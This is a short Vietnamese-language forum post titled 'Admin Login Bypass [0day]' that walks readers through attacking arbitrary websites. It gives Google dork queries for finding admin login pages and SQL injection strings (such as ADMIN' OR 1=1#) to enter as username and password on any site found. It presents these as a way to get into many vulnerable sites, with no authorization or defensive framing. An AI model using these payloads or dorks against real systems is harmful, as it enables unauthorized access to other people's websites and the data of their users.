Admin Login Bypass [0day]

—————————————————————————————————

Tôi tìm thấy một trang web và tôi thấy rằng trang quản trị của trang web đó có thể được truy cập chỉ đơn giản với một phương pháp bỏ qua xác thực.

Sau đó, tôi tìm kiếm các trang web khác với Dork trên để quét chúng, và tôi tìm thấy nhiều trang web dễ bị lỗi tương tự!

Vì vậy, tôi quyết định chia sẻ điều này với các bạn!

(Killer040)

Hướng dẫn Admin Login Bypass

{-} Vulnerable Versions => Hầu hết bị dính lỗi ở CMS của Plugin ‘iChecker’.Tiến hành:Bước 1: Tìm Link Admin Sử dụng 1 trong 2 link này để tìm Web Admin

Link 1: Tại đây
Link 2: Tại đây

Hoặc vào google gõ lệnh:

“Sign in to start your session” inurl:admin/login.php

hoặc

 "Sign in to start your session"

Bước 2:

Truy cập vào trang web bất kỳ mà google tìm thấy, đăng nhập vào trang web với user/admin dưới đây (có một số trường hợp password sẽ để trống)

User: ‘or”=’
Pass: ‘or”=’

hoặc

User: ADMIN' OR 1=1#
Pass: ADMIN' OR 1=1#

Kết quả:

Đánh giá post